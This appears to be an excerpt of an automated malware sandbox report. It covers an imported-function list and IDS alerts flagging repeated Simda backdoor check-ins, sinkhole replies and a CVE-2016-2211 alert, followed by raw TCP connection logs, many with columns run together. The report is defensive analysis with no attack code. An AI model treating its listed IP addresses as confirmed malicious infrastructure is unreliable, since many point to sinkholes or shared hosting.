kernel32.dll | SetLocaleInfoA, lstrcpyn, CreateNamedPipeA, GetEnvironmentVariableA, GetExitCodeThread, OpenEventW, GetLogicalDriveStringsA, CopyFileExW, SetPriorityClass, GetProcAddress, CreateMutexA, CreateMutexW, QueryPerformanceCounter, CreateThread, SetUnhandledExceptionFilter, OpenMutexW, GetExitCodeProcess, GlobalGetAtomNameA, GetFileTime, GetCalendarInfoA, MulDiv, CreateFileMappingW, CreateMailslotA, FreeResource, LocalFree, DeleteAtom, GetVolumeInformationA, RaiseException, AddAtomA, GlobalFindAtomW, RemoveDirectoryW, GlobalFindAtomA, CreateMailslotW, GetProcessHeaps, EndUpdateResourceA, CopyFileExA, CreateNamedPipeW, SleepEx, GetModuleHandleA, WaitForSingleObject, GetSystemDefaultLangID, SetEvent, TlsAlloc, SetCalendarInfoW, GetLastError, GetFileSize, lstrlen, DuplicateHandle, GetAtomNameW, GetStringTypeW, CreateFileA
USER32.DLL | CheckMenuItem, GetDC, DefDlgProcW, BringWindowToTop, GetDlgItem, EnumWindows, PeekMessageW, SetCursor, GetWindowLongA, MessageBoxIndirectW, CreatePopupMenu, keybd_event, GetWindowTextLengthA
gdi32.dll | CreateFontIndirectExA, CreatePolygonRgn, CreateDIBitmap, GetLogColorSpaceW, SetGraphicsMode, GdiGetBatchLimit, ScaleWindowExtEx, SelectObject, GetEnhMetaFileHeader, GetFontData, SetLayout, SetRectRgn, ExtSelectClipRgn, EnumFontFamiliesA, GetAspectRatioFilterEx, GetNearestPaletteIndex, PolylineTo, PatBlt, SelectClipRgn
ADVAPI32.DLL | RegEnumValueW, RegReplaceKeyA, RegCreateKeyW, RegQueryValueA, RegCreateKeyExA, RegReplaceKeyW, RegCloseKey
SHLWAPI.DLL | PathGetArgsW, ChrCmpIA, StrSpnW, PathAddBackslashW, PathIsUNCA, SHRegOpenUSKeyW, PathIsPrefixA, PathCompactPathExA
COMCTL32.DLL | FlatSB_SetScrollRange, InitCommonControls
winspool.drv | AddFormW, EnumMonitorsW, OpenPrinterW, GetJobW, DeleteMonitorA, EndDocPrinter, AddPrinterConnectionW, SetPrinterDataExW
INETCOMM.DLL | MimeOleParseRfc822Address, MimeOleParseRfc822AddressW, HrGetAttachIcon, EssSecurityLabelEncodeEx, MimeOleGetDefaultCharset, MimeOleGetFileExtension, HrAttachDataFromFile, EssKeyExchPreferenceEncodeEx, EssSignCertificateDecodeEx, MimeOleSMimeCapGetHashAlg, EssKeyExchPreferenceDecodeEx, MimeOleGetCharsetInfo, MimeOleGetCertsFromThumbprints

Language of compilation system | Country where language is spoken | Map
English | United States |

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-11T18:24:04.962880+0100 | 2021022 | ET MALWARE Wapack Labs Sinkhole DNS Reply | 1 | 1.1.1.1 | 53 | 192.168.2.8 | 53944 | UDP
2024-11-11T18:24:05.285685+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.8 | 49705 | 18.208.156.248 | 80 | TCP
2024-11-11T18:24:05.431780+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.8 | 49708 | 23.253.46.64 | 80 | TCP
2024-11-11T18:24:05.552641+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.8 | 49710 | 199.59.243.227 | 80 | TCP
2024-11-11T18:24:05.579738+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.8 | 49712 | 3.94.10.34 | 80 | TCP
2024-11-11T18:24:05.580932+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.8 | 49713 | 75.2.71.199 | 80 | TCP
2024-11-11T18:24:05.585920+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.8 | 49715 | 44.221.84.105 | 80 | TCP
2024-11-11T18:24:05.586456+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.8 | 49714 | 44.221.84.105 | 80 | TCP
2024-11-11T18:24:05.586777+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 3.94.10.34 | 80 | 192.168.2.8 | 49712 | TCP
2024-11-11T18:24:05.586777+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 3.94.10.34 | 80 | 192.168.2.8 | 49712 | TCP
2024-11-11T18:24:05.593017+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 44.221.84.105 | 80 | 192.168.2.8 | 49715 | TCP
2024-11-11T18:24:05.593017+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 44.221.84.105 | 80 | 192.168.2.8 | 49715 | TCP
2024-11-11T18:24:05.597685+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.8 | 49711 | 208.100.26.245 | 80 | TCP
2024-11-11T18:24:05.709221+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.8 | 49711 | 208.100.26.245 | 80 | TCP
2024-11-11T18:24:05.876538+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.8 | 49707 | 154.212.231.82 | 80 | TCP
2024-11-11T18:24:05.894705+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.8 | 49717 | 85.17.31.82 | 80 | TCP
2024-11-11T18:24:05.899510+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.8 | 49716 | 23.253.46.64 | 80 | TCP
2024-11-11T18:24:06.504059+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.8 | 49709 | 188.114.96.3 | 80 | TCP
                                                                                                                                                                                                          2024-11-11T18:24:06.504085+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849707154.212.231.8280TCP
                                                                                                                                                                                                          2024-11-11T18:24:06.504097+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84971985.17.31.8280TCP
                                                                                                                                                                                                          2024-11-11T18:24:06.744166+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84971875.2.71.199443TCP
                                                                                                                                                                                                          2024-11-11T18:24:07.324446+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849706199.191.50.8380TCP
                                                                                                                                                                                                          2024-11-11T18:24:07.933006+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849720188.114.96.3443TCP
                                                                                                                                                                                                          2024-11-11T18:24:08.341643+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849709188.114.96.380TCP
                                                                                                                                                                                                          2024-11-11T18:24:10.021818+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849721188.114.96.3443TCP
                                                                                                                                                                                                          2024-11-11T18:24:10.543538+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84972213.248.169.4880TCP
                                                                                                                                                                                                          2024-11-11T18:24:10.877685+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84972418.208.156.24880TCP
                                                                                                                                                                                                          2024-11-11T18:24:10.883804+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.208.156.24880192.168.2.849724TCP
                                                                                                                                                                                                          2024-11-11T18:24:10.883804+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.208.156.24880192.168.2.849724TCP
                                                                                                                                                                                                          2024-11-11T18:24:10.885259+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.8497253.94.10.3480TCP
                                                                                                                                                                                                          2024-11-11T18:24:11.029523+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849723188.114.97.380TCP
                                                                                                                                                                                                          2024-11-11T18:24:11.403094+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849726103.150.10.4880TCP
                                                                                                                                                                                                          2024-11-11T18:24:12.460365+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849726103.150.10.4880TCP
                                                                                                                                                                                                          2024-11-11T18:24:13.477876+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849727188.114.97.3443TCP
                                                                                                                                                                                                          2024-11-11T18:24:13.833912+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849723188.114.97.380TCP
                                                                                                                                                                                                          2024-11-11T18:24:16.088067+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849729188.114.97.3443TCP
                                                                                                                                                                                                          2024-11-11T18:24:16.605566+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84973076.223.67.18980TCP
                                                                                                                                                                                                          2024-11-11T18:24:16.769592+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84973164.225.91.7380TCP
                                                                                                                                                                                                          2024-11-11T18:24:16.770885+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84973244.221.84.10580TCP
                                                                                                                                                                                                          2024-11-11T18:24:17.039103+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849733103.224.212.21080TCP
                                                                                                                                                                                                          2024-11-11T18:24:17.050761+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849734103.224.182.25280TCP
                                                                                                                                                                                                          2024-11-11T18:24:17.440887+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849735154.85.183.5080TCP
                                                                                                                                                                                                          2024-11-11T18:24:17.731101+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849735154.85.183.5080TCP
                                                                                                                                                                                                          2024-11-11T18:24:18.913088+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84973964.225.91.7380TCP
                                                                                                                                                                                                          2024-11-11T18:24:19.113297+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84974172.52.179.17480TCP
                                                                                                                                                                                                          2024-11-11T18:24:19.426213+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.849738TCP
                                                                                                                                                                                                          2024-11-11T18:24:19.613186+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84974272.52.179.17480TCP
                                                                                                                                                                                                          2024-11-11T18:24:22.641586+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85359852.34.198.22980TCP
                                                                                                                                                                                                          2024-11-11T18:24:22.649459+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz152.34.198.22980192.168.2.853598TCP
                                                                                                                                                                                                          2024-11-11T18:24:22.649459+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst152.34.198.22980192.168.2.853598TCP
                                                                                                                                                                                                          2024-11-11T18:24:25.392786+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85935744.221.84.10580TCP
                                                                                                                                                                                                          2024-11-11T18:24:26.934349+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849711208.100.26.24580TCP
                                                                                                                                                                                                          2024-11-11T18:24:27.365769+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849711208.100.26.24580TCP
                                                                                                                                                                                                          2024-11-11T18:24:27.368088+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.863205199.59.243.22780TCP
                                                                                                                                                                                                          2024-11-11T18:24:27.368144+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.86320623.253.46.6480TCP
                                                                                                                                                                                                          2024-11-11T18:24:27.368144+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.86320785.17.31.8280TCP
                                                                                                                                                                                                          2024-11-11T18:24:27.403260+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849709188.114.96.380TCP
                                                                                                                                                                                                          2024-11-11T18:24:27.425746+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849707154.212.231.8280TCP
                                                                                                                                                                                                          2024-11-11T18:24:27.462423+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.86320875.2.71.19980TCP
                                                                                                                                                                                                          2024-11-11T18:24:27.808784+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.86320985.17.31.8280TCP
                                                                                                                                                                                                          2024-11-11T18:24:27.878793+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.86321023.253.46.6480TCP
                                                                                                                                                                                                          2024-11-11T18:24:27.912689+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849707154.212.231.8280TCP
                                                                                                                                                                                                          2024-11-11T18:24:28.359758+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.86321275.2.71.199443TCP
                                                                                                                                                                                                          2024-11-11T18:24:28.944020+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.863211188.114.96.3443TCP
                                                                                                                                                                                                          2024-11-11T18:24:29.830756+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849709188.114.96.380TCP
                                                                                                                                                                                                          2024-11-11T18:24:31.123927+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.863213188.114.96.3443TCP
                                                                                                                                                                                                          2024-11-11T18:24:31.543636+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849726103.150.10.4880TCP
                                                                                                                                                                                                          2024-11-11T18:24:31.699421+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849723188.114.97.380TCP
                                                                                                                                                                                                          2024-11-11T18:24:32.831483+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849726103.150.10.4880TCP
                                                                                                                                                                                                          2024-11-11T18:24:34.530489+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.861823188.114.97.3443TCP
                                                                                                                                                                                                          2024-11-11T18:24:34.922467+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849723188.114.97.380TCP
                                                                                                                                                                                                          2024-11-11T18:24:36.952023+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.861824188.114.97.3443TCP
                                                                                                                                                                                                          2024-11-11T18:24:37.303197+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849735154.85.183.5080TCP
                                                                                                                                                                                                          2024-11-11T18:24:37.589469+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.861825103.224.182.25280TCP
                                                                                                                                                                                                          2024-11-11T18:24:37.628005+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.861826103.224.212.21080TCP
                                                                                                                                                                                                          2024-11-11T18:24:37.871157+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849735154.85.183.5080TCP
                                                                                                                                                                                                          2024-11-11T18:24:39.913696+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.86483072.52.179.17480TCP
                                                                                                                                                                                                          2024-11-11T18:24:40.447338+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84931272.52.179.17480TCP
                                                                                                                                                                                                          2024-11-11T18:24:56.419947+01002021022ET MALWARE Wapack Labs Sinkhole DNS Reply11.1.1.153192.168.2.855775UDP
                                                                                                                                                                                                          2024-11-11T18:25:04.870772+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.862057TCP
                                                                                                                                                                                                          2024-11-11T18:25:05.332951+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.862047199.191.50.8380TCP
                                                                                                                                                                                                          2024-11-11T18:25:54.329448+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85352085.17.31.8280TCP
                                                                                                                                                                                                          2024-11-11T18:25:54.352111+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.853521199.59.243.22780TCP
                                                                                                                                                                                                          2024-11-11T18:25:54.360416+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.853519208.100.26.24580TCP
                                                                                                                                                                                                          2024-11-11T18:25:54.378278+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85352223.253.46.6480TCP
                                                                                                                                                                                                          2024-11-11T18:25:54.385974+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85352675.2.71.19980TCP
                                                                                                                                                                                                          2024-11-11T18:25:54.576801+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.853519208.100.26.24580TCP
                                                                                                                                                                                                          2024-11-11T18:25:54.823609+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.853523154.212.231.8280TCP
                                                                                                                                                                                                          2024-11-11T18:25:54.888954+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85353023.253.46.6480TCP
                                                                                                                                                                                                          2024-11-11T18:25:55.030079+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85352785.17.31.8280TCP
                                                                                                                                                                                                          2024-11-11T18:25:55.151694+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85353175.2.71.199443TCP
                                                                                                                                                                                                          2024-11-11T18:25:55.202595+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.853523154.212.231.8280TCP
                                                                                                                                                                                                          2024-11-11T18:25:55.335714+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.853524188.114.96.380TCP
                                                                                                                                                                                                          2024-11-11T18:25:56.561549+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.853540188.114.96.3443TCP
                                                                                                                                                                                                          2024-11-11T18:25:57.002925+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.853524188.114.96.380TCP
                                                                                                                                                                                                          2024-11-11T18:25:58.211626+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.853543188.114.96.3443TCP
                                                                                                                                                                                                          2024-11-11T18:25:58.781074+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.8535453.94.10.3480TCP
                                                                                                                                                                                                          2024-11-11T18:25:58.891700+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85354613.248.169.4880TCP
                                                                                                                                                                                                          2024-11-11T18:25:58.996976+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85354718.208.156.24880TCP
                                                                                                                                                                                                          2024-11-11T18:25:59.018402+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.853544188.114.96.380TCP
                                                                                                                                                                                                          2024-11-11T18:25:59.709522+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.853548103.150.10.4880TCP
                                                                                                                                                                                                          2024-11-11T18:26:00.942488+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.853549188.114.96.3443TCP
                                                                                                                                                                                                          2024-11-11T18:26:01.317843+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.853551103.150.10.4880TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.895884991 CET4971980192.168.2.885.17.31.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.899446011 CET804971623.253.46.64192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.899509907 CET4971680192.168.2.823.253.46.64
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.899545908 CET804971623.253.46.64192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.899579048 CET4971680192.168.2.823.253.46.64
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.899662971 CET804971785.17.31.82192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.899868011 CET4971680192.168.2.823.253.46.64
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.899892092 CET4971680192.168.2.823.253.46.64
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.901776075 CET804971985.17.31.82192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.901858091 CET4971980192.168.2.885.17.31.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.902012110 CET4971980192.168.2.885.17.31.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.907031059 CET804971985.17.31.82192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.083930016 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.084022999 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.374000072 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.374030113 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.374428034 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.374552011 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.455931902 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.503335953 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.503927946 CET8049707154.212.231.82192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.503948927 CET8049709188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.503962040 CET8049709188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.503968000 CET804971985.17.31.82192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.503972054 CET8049709188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.504059076 CET4970980192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.504085064 CET4970780192.168.2.8154.212.231.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.504096985 CET4971980192.168.2.885.17.31.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.504236937 CET8049707154.212.231.82192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.504286051 CET4970780192.168.2.8154.212.231.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.683527946 CET4971980192.168.2.885.17.31.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.688405991 CET804971985.17.31.82192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.743554115 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.743602037 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.743674994 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.743995905 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.744010925 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.744174004 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.744297028 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.744410038 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.744440079 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.744462967 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.744473934 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.744496107 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.744508982 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.745147943 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.745194912 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.826549053 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.826597929 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.826626062 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.826646090 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.826661110 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.826684952 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.827601910 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.827666998 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.827675104 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.827733040 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.827752113 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.827794075 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.827800989 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.827873945 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.828536034 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.828587055 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.906563044 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.906618118 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.906653881 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.906671047 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.906708956 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.906747103 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.907174110 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.907206059 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.907233000 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.907242060 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.907263041 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.907279968 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.907284975 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.907305002 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.907320976 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.907344103 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.908801079 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.908818007 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.209656954 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.209744930 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.216227055 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.216236115 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.216604948 CET44349720188.114.96.3192.168.2.8
